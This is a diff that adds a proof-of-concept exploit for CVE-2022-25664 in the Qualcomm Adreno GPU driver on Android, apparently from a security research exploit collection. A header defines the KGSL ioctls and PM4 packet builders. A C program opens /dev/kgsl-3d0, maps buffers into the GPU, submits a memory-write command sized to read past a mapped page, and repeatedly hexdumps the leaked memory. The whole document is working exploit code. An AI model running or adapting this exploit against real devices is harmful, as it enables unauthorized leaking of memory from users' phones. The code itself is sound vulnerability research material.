diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno.h b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno.h
new file mode 100644
index 0000000..7224cc6
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno.h
@@ -0,0 +1,218 @@
+#ifndef ADRENO_H
+#define ADRENO_H
+
+#define KGSL_MEMFLAGS_GPUREADONLY 0x01000000U
+
+enum kgsl_user_mem_type {
+    KGSL_USER_MEM_TYPE_PMEM         = 0x00000000,
+    KGSL_USER_MEM_TYPE_ASHMEM       = 0x00000001,
+    KGSL_USER_MEM_TYPE_ADDR         = 0x00000002,
+    KGSL_USER_MEM_TYPE_ION          = 0x00000003,
+    KGSL_USER_MEM_TYPE_DMABUF       = 0x00000003,
+    KGSL_USER_MEM_TYPE_MAX          = 0x00000007,
+};
+
+struct kgsl_command_object {
+    uint64_t offset;
+    uint64_t gpuaddr;
+    uint64_t size;
+    unsigned int flags;
+    unsigned int id;
+};
+
+struct kgsl_gpu_command {
+	uint64_t flags;
+	uint64_t __user cmdlist;
+	unsigned int cmdsize;
+	unsigned int numcmds;
+	uint64_t __user objlist;
+	unsigned int objsize;
+	unsigned int numobjs;
+	uint64_t __user synclist;
+	unsigned int syncsize;
+	unsigned int numsyncs;
+	unsigned int context_id;
+	unsigned int timestamp;
+};
+
+struct kgsl_map_user_mem {
+    int fd;
+    unsigned long gpuaddr;   /*output param */
+    size_t len;
+    size_t offset;
+    unsigned long hostptr;   /*input param */
+    enum kgsl_user_mem_type memtype;
+    unsigned int flags;
+};
+
+struct kgsl_drawctxt_create {
+    unsigned int flags;
+    unsigned int drawctxt_id; /*output param */
+};
+
+/* destroy a draw context */
+struct kgsl_drawctxt_destroy {
+    unsigned int drawctxt_id;
+};
+
+
+#define KGSL_IOC_TYPE 0x09
+
+#define IOCTL_KGSL_DRAWCTXT_CREATE \
+        _IOWR(KGSL_IOC_TYPE, 0x13, struct kgsl_drawctxt_create)
+
+#define IOCTL_KGSL_DRAWCTXT_DESTROY \
+        _IOW(KGSL_IOC_TYPE, 0x14, struct kgsl_drawctxt_destroy)
+
+#define IOCTL_KGSL_MAP_USER_MEM \
+        _IOWR(KGSL_IOC_TYPE, 0x15, struct kgsl_map_user_mem)
+
+#define IOCTL_KGSL_GPU_COMMAND \
+        _IOWR(KGSL_IOC_TYPE, 0x4A, struct kgsl_gpu_command)
+
+#define KGSL_CMDLIST_IB             0x00000001U
+#define KGSL_MEMFLAGS_USE_CPU_MAP   0x10000000ULL
+
+#define CP_TYPE4_PKT    (4 << 28)
+#define CP_TYPE7_PKT    (7 << 28)
+
+#define CP_NOP                  0x10
+#define CP_WAIT_FOR_ME          0x13
+#define CP_WAIT_FOR_IDLE        0x26
+#define CP_WAIT_REG_MEM         0x3c
+#define CP_MEM_WRITE            0x3d
+#define CP_INDIRECT_BUFFER_PFE  0x3f
+#define CP_SET_DRAW_STATE       0x43
+#define CP_MEM_TO_MEM           0x73
+#define CP_SET_PROTECTED_MODE   0x5f
+
+#define upper_32_bits(n) ((uint32_t)(((n) >> 16) >> 16))
+#define lower_32_bits(n) ((uint32_t)(n))
+
+
+#define PT_BASE 0xfc000000
+#define KGSL_OBJLIST_MEMOBJ  0x00000008U
+#define KGSL_OBJLIST_PROFILE 0x00000010U
+#define KGSL_DRAWOBJ_PROFILING      0x00000010
+#define KGSL_MEMFLAGS_IOCOHERENT  (1ULL << 31)
+
+struct kgsl_device_getproperty {
+	unsigned int type;
+	void *value;
+	size_t sizebytes;
+};
+
+#define IOCTL_KGSL_DEVICE_GETPROPERTY \
+	_IOWR(KGSL_IOC_TYPE, 0x2, struct kgsl_device_getproperty)
+
+
+struct kgsl_gpumem_alloc_id {
+	unsigned int id;
+	unsigned int flags;
+	uint64_t size;
+	uint64_t mmapsize;
+	unsigned long gpuaddr;
+};
+
+struct kgsl_gpumem_free_id {
+	unsigned int id;
+};
+
+#define IOCTL_KGSL_GPUMEM_ALLOC_ID \
+	_IOWR(KGSL_IOC_TYPE, 0x34, struct kgsl_gpumem_alloc_id)
+
+struct kgsl_sharedmem_free {
+	unsigned long gpuaddr;
+};
+
+#define IOCTL_KGSL_SHAREDMEM_FREE \
+	_IOW(KGSL_IOC_TYPE, 0x21, struct kgsl_sharedmem_free)
+
+static inline uint cp_gpuaddr(uint *cmds, uint64_t gpuaddr)
+{
+    uint *start = cmds;
+
+    *cmds++ = lower_32_bits(gpuaddr);
+    *cmds++ = upper_32_bits(gpuaddr);
+
+    return cmds - start;
+}
+
+static inline uint pm4_calc_odd_parity_bit(uint val) {
+    return (0x9669 >> (0xf & ((val) ^
+                              ((val) >> 4) ^ ((val) >> 8) ^ ((val) >> 12) ^
+                              ((val) >> 16) ^ ((val) >> 20) ^ ((val) >> 24) ^
+                              ((val) >> 28)))) & 1;
+}
+
+static inline uint cp_type7_packet(uint opcode, uint cnt) {
+    return CP_TYPE7_PKT | ((cnt) << 0) |
+           (pm4_calc_odd_parity_bit(cnt) << 15) |
+           (((opcode) & 0x7F) << 16) |
+           ((pm4_calc_odd_parity_bit(opcode) << 23));
+}
+
+static inline uint cp_wait_for_me(
+        uint *cmds)
+{
+    uint *start = cmds;
+
+    *cmds++ = cp_type7_packet(CP_WAIT_FOR_ME, 0);
+
+    return cmds - start;
+}
+
+static inline uint cp_mem_packet(int opcode, uint size, uint num_mem) {
+    return cp_type7_packet(opcode, size + num_mem);
+}
+
+static inline uint cp_wait_for_idle(
+        uint *cmds)
+{
+    uint *start = cmds;
+
+    *cmds++ = cp_type7_packet(CP_WAIT_FOR_IDLE, 0);
+
+    return cmds - start;
+}
+
+static inline int _adreno_iommu_add_idle_indirect_cmds(
+        unsigned int *cmds)
+{
+    unsigned int *start = cmds;
+    cmds += cp_wait_for_me(cmds);
+    *cmds++ = cp_mem_packet(CP_INDIRECT_BUFFER_PFE, 2, 1);
+    cmds += cp_gpuaddr(cmds, 0xfc000000+1024);
+    *cmds++ = 2;
+    cmds += cp_wait_for_idle(cmds);
+    return cmds - start;
+}
+
+static inline uint cp_type4_packet(uint opcode, uint cnt)
+{
+    return CP_TYPE4_PKT | ((cnt) << 0) |
+           (pm4_calc_odd_parity_bit(cnt) << 7) |
+           (((opcode) & 0x3FFFF) << 8) |
+           ((pm4_calc_odd_parity_bit(opcode) << 27));
+}
+
+static inline uint cp_register(
+        unsigned int reg, unsigned int size)
+{
+    return cp_type4_packet(reg, size);
+}
+
+static inline uint cp_invalidate_state(
+        uint *cmds)
+{
+    uint *start = cmds;
+
+    *cmds++ = cp_type7_packet(CP_SET_DRAW_STATE, 3);
+    *cmds++ = 0x40000;
+    *cmds++ = 0;
+    *cmds++ = 0;
+
+    return cmds - start;
+}
+
+#endif
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno_user.c b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno_user.c
new file mode 100644
index 0000000..ba980e8
--- /dev/null
+++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno_user.c
@@ -0,0 +1,221 @@
+#include <err.h>
+#include <errno.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <time.h>
+#include <poll.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <ctype.h>
+
+#include "adreno.h"
+
+#define LEAK_SIZE 100
+
+#define COMMAND_SIZE 4
+
+static void hexdump(void *_data, size_t byte_count) {
+  printf("hexdump(%p, 0x%lx)\n", _data, (uint64_t)byte_count);
+  for (uint64_t byte_offset = 0; byte_offset < byte_count; byte_offset += 16) {
+    unsigned char *bytes = ((unsigned char*)_data) + byte_offset;
+    uint64_t line_bytes = (byte_count - byte_offset > 16) ?
+	    16 : (byte_count - byte_offset);
+    char line[1000];
+    char *linep = line;
+    linep += sprintf(linep, "%08lx  ", byte_offset);
+    for (int i=0; i<16; i++) {
+      if (i >= line_bytes) {
+        linep += sprintf(linep, "   ");
+      } else {
+        linep += sprintf(linep, "%02hhx ", bytes[i]);
+      }
+    }
+    linep += sprintf(linep, " |");
+    for (int i=0; i<line_bytes; i++) {
+      if (isalnum(bytes[i]) || ispunct(bytes[i]) || bytes[i] == ' ') {
+        *(linep++) = bytes[i];
+      } else {
+        *(linep++) = '.';
+      }
+    }
+    linep += sprintf(linep, "|");
+    puts(line);
+  }
+}
+
+int kgsl_ctx_create(int fd, uint32_t *ctx_id)
+{
+	struct kgsl_drawctxt_create req = {
+			.flags = 0x00001812,
+	};
+	int ret;
+
+	ret = ioctl(fd, IOCTL_KGSL_DRAWCTXT_CREATE, &req);
+	if (ret)
+		return ret;
+
+	*ctx_id = req.drawctxt_id;
+
+	return 0;
+}
+
+int kgsl_gpu_command_payload(int fd, uint32_t ctx_id, uint32_t gpuaddr, uint32_t cmdsize, uint32_t n, uint32_t target_idx, uint64_t target_cmd, uint32_t target_size) {
+    struct kgsl_command_object *cmds;
+
+    struct kgsl_gpu_command req = {
+            .context_id = ctx_id,
+            .cmdsize = sizeof(struct kgsl_command_object),
+            .numcmds = n,
+    };
+    size_t cmds_size;
+    uint32_t i;
+
+    cmds_size = n * sizeof(struct kgsl_command_object);
+
+    cmds = (struct kgsl_command_object *) malloc(cmds_size);
+
+    if (cmds == NULL) {
+        return -1;
+    }
+
+    memset(cmds, 0, cmds_size);
+
+    for (i = 0; i < n; i++) {
+        cmds[i].flags = KGSL_CMDLIST_IB;
+
+        if (i == target_idx) {
+            cmds[i].gpuaddr = target_cmd;
+            cmds[i].size = target_size;
+        }
+        else {
+            /* the shift here is helpful for debugging failed alignment */
+            cmds[i].gpuaddr = gpuaddr + (i << 16);
+            cmds[i].size = cmdsize;
+        }
+    }
+    req.cmdlist = (unsigned long) cmds;
+    return ioctl(fd, IOCTL_KGSL_GPU_COMMAND, &req);
+}
+
+int kgsl_map(int fd, unsigned long addr, size_t len, uint32_t *gpuaddr, int readonly) {
+    struct kgsl_map_user_mem req = {
+            .len = len,
+            .offset = 0,
+            .hostptr = addr,
+            .memtype = KGSL_USER_MEM_TYPE_ADDR,
+            .flags = KGSL_MEMFLAGS_USE_CPU_MAP,
+    };
+    if (readonly) {
+      req.flags |= KGSL_MEMFLAGS_GPUREADONLY;
+    }
+    int ret;
+
+    ret = ioctl(fd, IOCTL_KGSL_MAP_USER_MEM, &req);
+    if (ret)
+        return ret;
+
+    *gpuaddr = req.gpuaddr;
+
+    return 0;
+}
+
+int main() {
+    int fd;
+    uint32_t *write_cmds, write_cmds_size;
+    uint32_t *write_cmd_buf, write_cmd_gpuaddr;
+    uint32_t *indirect_cmds, indirect_cmds_size;
+    uint32_t *indirect_cmd_buf, indirect_cmd_gpuaddr;
+    uint32_t size = PAGE_SIZE;
+    uint32_t *shared_mem_buf, shared_mem_gpuaddr;
+    uint32_t *shared_mem_buf2, shared_mem_gpuaddr2;
+
+    int ret;
+
+    fd = open("/dev/kgsl-3d0", O_RDWR);
+
+    if (fd == -1) {
+        err(1, "cannot open kgsl");
+    }
+
+    write_cmd_buf = (uint32_t *) mmap((void *)0x40000000, size,
+                                        PROT_READ|PROT_WRITE,
+                                        MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
+
+    if (write_cmd_buf == MAP_FAILED) {
+        err(1, "mmap failed");
+    }
+
+    if (kgsl_map(fd, (unsigned long) write_cmd_buf, size, &write_cmd_gpuaddr, 0) == -1) {
+        err(1, "kgsl_map failed (write_cmd_buf)");
+    }
+
+    shared_mem_buf = (uint32_t*)mmap((void*)0x50000000, size,
+                                        PROT_READ|PROT_WRITE,
+                                        MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
+    if (shared_mem_buf == MAP_FAILED) {
+      err(1, "shared_mem_buf failed");
+    }
+
+    if (kgsl_map(fd, (unsigned long) shared_mem_buf, PAGE_SIZE, &shared_mem_gpuaddr, 0) == -1) {
+      err(1, "kgsl_map failed (shared_mem_buf)");
+    }
+
+    write_cmd_buf = write_cmd_buf + 0x1000/COMMAND_SIZE - 5;
+    write_cmd_gpuaddr = write_cmd_gpuaddr + 0x1000 - 5 * COMMAND_SIZE;
+
+    write_cmds = write_cmd_buf;
+
+    *write_cmds++ = cp_type7_packet(CP_NOP, 1);
+    *write_cmds++ = 0xffffffff;
+
+    *write_cmds++ = cp_type7_packet(CP_MEM_WRITE, 2 + LEAK_SIZE);
+
+    write_cmds += cp_gpuaddr(write_cmds, shared_mem_gpuaddr);
+
+    uint32_t ctx_id;
+    if (kgsl_ctx_create(fd, &ctx_id)) {
+      err(1, "kgsl_ctx_create failed.");
+    }
+
+    uint32_t cmdsize = (write_cmds - write_cmd_buf) * 4;
+
+    usleep(50000);
+
+    uint64_t shared_mem_size = 0x1000;
+    while (1) {
+		shared_mem_buf2 = (uint32_t*)mmap((void*)0x40001000, shared_mem_size,
+		                                    PROT_READ,
+		                                    MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
+		if (shared_mem_buf2 == MAP_FAILED) {
+		  err(1, "shared_mem_buf2 failed");
+		}
+
+		ret = kgsl_map(fd, (unsigned long) shared_mem_buf2, shared_mem_size, &shared_mem_gpuaddr2, 1);
+		
+		if (ret == -1) {
+		  err(1, "kgsl_map failed (shared_mem_buf2)");
+		}
+
+		if (kgsl_gpu_command_payload(fd, ctx_id, 0, cmdsize, 1, 0, write_cmd_gpuaddr, (write_cmds - write_cmd_buf + LEAK_SIZE) * COMMAND_SIZE)) {
+		  err(1, "gpu_command failed.");
+		}
+
+		usleep(50000);
+        hexdump(shared_mem_buf, LEAK_SIZE * COMMAND_SIZE);
+
+		munmap(shared_mem_buf2, shared_mem_size);
+
+		struct kgsl_sharedmem_free free_param = {.gpuaddr = shared_mem_gpuaddr2};
+		if (ioctl(fd, IOCTL_KGSL_SHAREDMEM_FREE, &free_param) < 0) {
+		  err(1, "unable to free memory\n");
+		}
+		sleep(5);
+    }
+}